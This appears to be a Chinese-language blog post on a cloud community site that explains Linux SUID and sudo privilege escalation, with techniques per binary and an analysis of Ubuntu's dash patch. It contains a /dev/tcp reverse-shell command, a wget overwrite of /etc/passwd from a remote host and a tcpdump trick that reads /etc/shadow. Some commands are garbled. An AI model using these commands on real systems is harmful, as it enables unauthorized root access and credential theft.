对Linux|suid提权的一些总结

举报
亿人安全 发表于 2023/04/28 09:15:20 2023/04/28
【摘要】 前言:人们赞美流星,是因为它燃烧着走完自己的全部路程。一、初识SUID1.suid的简介suid即set user id,是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。已知的可以用来提权的Linux可执行文件有:CopyNmap、Vim、find、Bash、More、Less、Nano、cp比如常用的ping命令。ping...

前言:人们赞美流星,是因为它燃烧着走完自己的全部路程。

一、初识SUID

1.suid的简介

suid即set user id,是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。
已知的可以用来提权的Linux可执行文件有:
CopyNmap、Vim、find、Bash、More、Less、Nano、cp
比如常用的ping命令。ping需要发送ICMP报文,而这个操作需要发送Raw Socket。在Linux 2.2引入CAPABILITIES前,使用Raw Socket是需要root权限的(当然不是说引入CAPABILITIES就不需要权限了,而是可以通过其他方法解决,这个后说),所以你如果在一些老的系统里ls -al $(which ping),可以发现其权限是-rwsr-xr-x,其中有个s位,这就是suid:

  1. root@linux:# ls -al /bin/ping
  2. -rwsr-xr-x 1 root root 44168 May 7 2021 /bin/ping

设置了s位的程序在运行时,其Effective UID将会设置为这个程序的所有者。比如,/bin/ping这个程序的所有者是root,它设置了s位,那么普通用户在运行ping时其Effective UID就是0,等同于拥有了root权限。

这里引入了一个新的概念Effective UID。Linux进程在运行时有三个UID:
Real UID 执行该进程的用户实际的UID,谁通过shell运行就是谁
Effective UID 程序实际操作时生效的UID,一般在进程启动时,直接由Real UID复制而来;或者是当进程对应的可执行文件的suid标志位为s时,为该文件的所属用户/组。所以利用suid文件进行提权需要2个前提:文件的所有者是 0 号或其他super user 文件拥有suid权限
在os层面目前常见发行版linux也会对suid的权限进行限制,具体可以参考p神这篇文章 ,把suid的提权简单抽象为一个c代码:

  1. int main(int argc, char* argv[]) {
  2. return system(argv[1]);
  3. }

编译并赋予suid权限:

  1. root@linux:/tmp# gcc suid.c -o suid
  2. root@linux:/tmp# chmod +s suid

2./etc/sudoers 语法

  1. root ALL=(ALL) ALL

root 用户可以从 ALL(任何)终端执行,充当ALL(任何)用户,并运行ALL(任何)命令。第一部分指定用户,第二部分指定可充当用户,第三部分指定 sudo 可运行的命令。

touhid ALL= /sbin/poweroff

输入 touchid 的密码,可以 sudo 执行 poweroff 命令。

touhid ALL = (root) NOPASSWD: /usr/bin/find

不输入密码,可以 sudo 执行 find 命令。

这里引入了一个新的概念Effective UID。Linux进程在运行时有三个UID:

Real UID 执行该进程的用户实际的UID

Effective UID 程序实际操作时生效的UID(比如写入文件时,系统会检查这个UID是否有权限)

Saved UID 在高权限用户降权后,保留的其原本UID(本文中不对这个UID进行深入探讨)

通常情况下Effective UID和Real UID相等,所以普通用户不能写入只有UID=0号才可写的/etc/passwd;有suid的程序启动时,Effective UID就等于二进制文件的所有者,此时Real UID就可能和Effective UID不相等了。

有的同学说某某程序只要有suid权限,就可以提权,这个说法其实是不准确的。只有这个程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。

2. 查找具有 SUID 权限位文件

以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;

也可以使用 sudo -l 命令列出当前用户可执行的命令

1631231537_613a9e313dab88b08bfd0.png!small?1631231538155

二、常见的提权方式

1.Nmap

nmap是一个经典的端口扫描工具,当目标主机存在版本在2.02-5.21之间的nmap且os的版本在上面受影响的范围内或更早就可以尝试使用这种方法进行提权。

nmap --interactive //进入交互模式

1631231551_613a9e3f5579261a6edb0.png!small?1631231552213

nmap -v //查看版本

1631231566_613a9e4ebca3f4db1ff65.png!small?1631231567656

nmap> !sh sh-3.2# whoami root

1631231586_613a9e627f6d31c05e59f.png!small?1631231587313

Metasploit也有利用SUID Nmap进行提权攻击:
exploit/unix/local/setuid_nmap
1631231599_613a9e6faff7fa2c9ff18.png!small?1631231600564

nmap提权失败可能出现的原因

nmap在高版本中限制了suid权限

lua脚本中限制了suid权限

新版Linux系统对子进程的suid权限进行了限制

2.Find

如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。

1631231614_613a9e7e03c3df9004555.png!small?1631231614800


$ find 1sh -exec bash -i >& /dev/tcp/192.168.100.173/5656 0>&1 \;

1631231626_613a9e8a0a33c056822e9.png!small?1631231626828

3.Vi/Vim

vim是linux下常见的文本编辑器,但是如果vim被配置了suid权限,那么运行时就会获取高权限进而对只有root用户才有权限读写的文件进行操作或获取高权限shell。在vi/vim中按下esc再输入一下内容即可获取到root的shell :

1631231647_613a9e9fc3b9c0cce94be.png!small?16312316486861631231656_613a9ea8744c9d55c5be6.png!small?1631231657612

vim.tinyPress ESC key:set shell=/bin/sh:shell

1631231668_613a9eb461bb9143ac24d.png!small?1631231669190

4.bash

bash -pid

1631231681_613a9ec193f39d67177b1.png!small?1631231682502

5.Less/More

Less 和 more 都可以执行提权的shell

less /etc/passwd

1631231698_613a9ed2311e509bfee1f.png!small?1631231699482

!/bin/sh

1631231709_613a9edd41cf58405465c.png!small?1631231710196

6.python/perl/ruby/lua/php/etc

python -c "importos;os.system('/bin/bash')

7.cp覆盖 /etc/shadow 或 /etc/passwd

1631231724_613a9eec6d60257d711e6.png!small?1631231725233

8.mv

覆盖 /etc/shadow 或 /etc/passwd

9.其它方式


nano


nano /etc/passwd


awk


awk 'BEGIN {system("/bin/sh")}'


man


man passwd


!/bin/bash


wget


wget http://192.168.56.1:8080/passwd -O /etc/passwd


apache


仅可查看文件,不能弹 shell:


apache2 -f /etc/shadow


tcpdump


echo $'id\ncat /etc/shadow' > /tmp/.test


chmod +x /tmp/.test


sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root


python/perl/ruby/lua/php/etc


python


python -c "import os;os.system('/bin/bash')"


perl


exec "/bin/bash";

三、查找SUID权限文件

以下命令可以找到正在系统上运行的所有SUID可执行文件,命令将从 / 目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm ``-4000-``print2``>/dev/nullfind / -perm -u=s -type f ``2``>/dev/nullfind / -user root -perm ``-4000-exec ls -ldb {} \;

不同版本下linux的不同输出

Linux发行版 输出结果
Ubuntu 14.04 uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Ubuntu 16.04 uid=33(www-data) gid=33(www-data) groups=33(www-data)
Ubuntu 18.04 uid=33(www-data) gid=33(www-data) groups=33(www-data)
CentOS 6 uid=33(www-data) gid=33(www-data) groups=33(www-data)
CentOS 8 uid=33(www-data) gid=33(www-data) groups=33(www-data)
Debian 6 uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Debian 8 uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Kali 2019 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ubuntu 16.04的不同之处就在dash目录

下载其中的dash_0.5.8.orig.tar.gzdash_0.5.8-2.1ubuntu2.diff.gz并分别解压,我们可以看到dash 0.5.8的原始代码,和Ubuntu对其做的patch。

我们对原始代码进行patch后,会发现多了一个setprivileged函数:

void setprivileged(int on)
{
    static int is_privileged = 1;
    if (is_privileged == on)
        return;
    is_privileged = on;

    /*
     * To limit bogus system(3) or popen(3) calls in setuid binaries, require
     * -p flag to work in this situation.
     */
    if (!on && (uid != geteuid() || gid != getegid())) {
        setuid(uid);
        setgid(gid);
        /* PS1 might need to be changed accordingly. */
        choose_ps1();
    }
}

on的取值取决于用户是否传入了-p参数, 而uid和gid就是当前进程的Real UID(GID)。可见,在on为false,且Real UID 不等于Effective UID的情况下,这里重新设置了进程的UID:

setuid(uid)

setuid函数用于设置当前进程的Effective UID,如果当前进程是root权限或拥有CAP_SETUID权限,则Real UID和Saved UID将被一起设置。

所以,可以看出,Ubuntu发行版官方对dash进行了修改:当dash以suid权限运行、且没有指定-p选项时,将会丢弃suid权限,恢复当前用户权限。

这样以来,dash在suid的表现上就和bash相同了,这也就解释了为什么在Ubuntu 16.04以后,我们无法直接使用SUID+**system**()的方式来提权。

总结
suid提权是渗透测试种经常遇到的情况,遇见的不同系统、不同环境都会有不同的提权方式,掌握多种提权方式是渗透的必备的。

参考链接

https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。